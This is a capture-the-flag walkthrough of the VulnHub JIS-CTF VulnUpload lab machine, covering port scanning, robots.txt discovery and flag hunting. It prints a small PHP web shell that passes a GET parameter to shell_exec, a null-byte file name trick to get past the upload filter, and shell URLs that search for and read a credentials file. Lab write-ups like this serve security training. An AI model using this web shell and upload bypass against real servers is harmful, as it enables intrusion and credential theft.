This article is a walk through on Jorder InfoSec CTF challenge: https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
This is a basic web challenge consisting of 5 flags. I ran it on Virtualbox with bridged mode. This app doesn’t require kali os. You can do it on windows as well.
To find the vulnerable machines through your attacking machine: http://www.anonhack.in/2018/06/part-2-finding-the-ip-address-of-your-victim-in-your-vmware-hacking-lab-network/
Let’s see the steps:
- Boot the machine, Use Advanced IP scanner or netdiscover {in Kali} to get the IP address of the machine. Mine is 192.168.0.106
- Scan the host with nmap::
So the open ports are 80 and 22. 80 Tells us that it is running a website:
I checked it’s Source code but found nothing interesting there.
- So as always, I checked robots.txt and found some information:
The directories that exist in the above file are : admin_area, uploaded_files and flag.
- You will find the first flag in /flag directory.
- Now, I visited /admin_area but it doesn’t give much information:
- until you visit it’s source code which gives out the second flag and the admin username and password:
- I used these login information to log on in the 2nd step portal. This upload page appears after log in:
- I uploaded a self coded php command injection file to interact with the machine. The PHP code I used is this:
<?php
$output = shell_exec($_GET[‘kus’]);
echo “<pre>”.$output.”</pre>”;
?>NOTE: I put this code in j3.php file and uploaded it. At first It wasn’t uploading and when I checked in burpsuite it was adding .jpg in the end of the file so I used null injection “j3.php%00.jpg” to trick the machine and I successfully got this file uploaded.
9. With this file uploaded, I can inject OS commands and hence execute them. 
10. I ran this command to go one directory back and list the files in there:
192.168.0.106/uploaded_files/j3.php?kus=ls %% cd ..
I tried to visit flag.txt but I wasn’t permitted to view the file, So got a forbidden message. I then open hint.txt file which got me to the 3rd flag. 
The hint is pretty forward.
11. The hint tells us that the flag.txt file need us to be technawi and for that we need it’s password. So the first thing I need to do is to find its password. But How? What I knew was that I can find it only under that user. So I tried this command.
http://192.168.0.106/uploaded_files/j3.php?kus=find%20/%20-user%20technawi
which gave me this output:
I saw the credentials.txt file via cat command
http://192.168.0.106/uploaded_files/j3.php?kus=cat%20/etc/mysql/conf.d/credentials.txt
which gave me the 4th flag with technawi username and password details:
I logged in technawi using ssh [I used putty since I entirely used windows]
Now, The only flag left was in the flag.txt file which was not forbidden for us under admin details. I located flag.txt.
This is it folks!
Ciao for Now!